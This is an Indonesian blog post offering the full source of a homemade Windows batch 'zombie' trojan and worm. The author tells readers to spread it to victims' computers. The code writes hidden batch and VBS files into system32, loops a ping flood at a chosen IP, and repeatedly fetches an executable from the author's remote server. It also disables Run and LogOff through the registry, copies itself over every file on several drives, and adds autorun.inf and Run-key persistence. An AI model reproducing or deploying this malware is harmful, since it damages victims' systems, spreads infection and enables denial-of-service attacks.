THOUSANDS OF FREE BLOGGER TEMPLATES

Selasa, 07 Juni 2011

ZOMBIE trojan

dulu pernah buat nie thread but dah ke hapus ,mybe krna paas serangan dulu2 di hn.
hem ok nie gw cuma mau share ajah zombie buatan gw.
[quote]
      ----------------------PERHATIAN----------------------
1.Jangan sekali-kali mencoba di komputer sendiri karena zombie ini untuk di komputer victim/korban.
jadi ini harus di sebar ke komputer orang lain agar menjadi wadah zombie ini jalan.

2.Cara kerjanya mudah sekali tinggal di klik zombie jalan.
efek yang bisa di lihat ketika komputer telah shutdown atau logoff

3.ketika komputer hidup dari logoff atau shutdown zombie ini akan menciptakan 2 anakan zombie,1 worm,autorun dan 1 file pendukung untuk me jalankan 2 zombie dan 1 worm.

anakan zombie 1 dengan nama boot.bat
untuk menyerang ip  192.168.1.1
ip nya bisa di ganti sesuai keinginan anda mau menyerang web apa.

anakan zombie 2 dengan nama 736F686169207761732068657265.bat
berfungis untuk mendownload file server trojan gw
yg bisa di akses di http://h1.ripway.com/hack02/sex.exe 
jika kalian punya file server trojan sendiri bisa di tambahkan.

teakhir 1 worm untuk penyebaran,dan pertahanan.
[/quote]

nah ini dia script code nya
code:
::Prompt di baca off:: echo off ::Memberi judul prompt:: title 736F686169207761732068657265 ::Memberi warna background hitam dan tulisan hijau muda:: color 0a ::Menghapus layar Prompt:: cls ::Membuat anakan 1 dengan nama wxhshell.vbs : echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "cmd" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs ::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS:: echo echo off >>C:\windows\system32\boot.bat echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat echo mode 67,16 >>C:\windows\system32\boot.bat echo color 0c >>C:\windows\system32\boot.bat echo cls >>C:\windows\system32\boot.bat echo :DDOS >>C:\windows\system32\boot.bat echo echo Attacking Server 192.168.1.1 >>C:\windows\system32\boot.bat echo ping [color=#FF0000]192.168.1.1[/color] -i 100000 -t >nul >>C:\windows\system32\boot.bat echo goto DDOS >>C:\windows\system32\boot.bat ::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah:: echo echo off >>C:\windows\system32\736F686169207761732068657265.bat echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat echo cls >>C:\windows\system32\736F686169207761732068657265.bat echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat ::connect ke ripway untuk mendownload file sex.exe:: echo start firefox "[color=#FF0000]http://h1.ripway.com/hack02/sex.exe[/color]" >>C:\windows\system32\736F686169207761732068657265.bat echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat ::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder:: MD\\.\\C:\CON MD\\.\\D:\CON MD\\.\\E:\CON MD\\.\\F:\CON ::membuat pertahhanan untuk zombie2 berbentuk folder aux:: MD\\.\\C:\aux MD\\.\\D:\aux MD\\.\\E:\aux MD\\.\\F:\aux ::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran:: echo echo off >>C:\CON\7461737961.bat echo cls >>C:\CON\7461737961.bat echo color oa >>C:\CON\7461737961.bat ::Fungsi manipulasi:: echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat ::Penyebaran:: echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat ::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F :: copy "C:\windows\system32\boot.bat" "C:\boot.bat" copy "C:\windows\system32\boot.bat" "D:\boot.bat" copy "C:\windows\system32\boot.bat" "E:\boot.bat" copy "C:\windows\system32\boot.bat" "F:\boot.bat" ::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F :: copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat" copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat" copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat" ::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F :: copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat" :::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F :: copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat" ::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden :: Attrib +r +h C:\windows\system32\boot.bat Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat Attrib +r +h C:\CON\7461737961.bat Attrib +r +h D:\CON\7461737961.bat Attrib +r +h E:\CON\7461737961.bat Attrib +r +h F:\CON\7461737961.bat Attrib +r +h C:\boot.bat Attrib +r +h D:\boot.bat Attrib +r +h E:\boot.bat Attrib +r +h F:\boot.bat Attrib +r +h C:\aux\736F686169207761732068657265.bat Attrib +r +h D:\aux\736F686169207761732068657265.bat Attrib +r +h E:\aux\736F686169207761732068657265.bat Attrib +r +h F:\aux\736F686169207761732068657265.bat ::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis:: echo [Autorun] >> C:\autorun.inf echo shellexecute=boot.bat >> C:\autorun.inf ::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F:: Copy "C:\autorun.inf" "D:\autorun.inf" Copy "C:\autorun.inf" "E:\autorun.inf" Copy "C:\autorun.inf" "F:\autorun.inf" ::Membuat file autorun ter hidden dari drive C D E F :: Attrib +r +h C:\autorun.inf Attrib +r +h D:\autorun.inf Attrib +r +h E:\autorun.inf Attrib +r +h F:\autorun.inf ::Proses auto running file zombie dan worm:: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f
PERHATIAN JIKA KOMPUTER SUDAH TERKENA ZOMBIE INI GW BARU BUAT REMOVE NYA HANYA UNTUK ZOMBIE SAJA,UNTUK WORM BELUM DI PIKIRKAN. http://sohai.byethost4.com

0 komentar: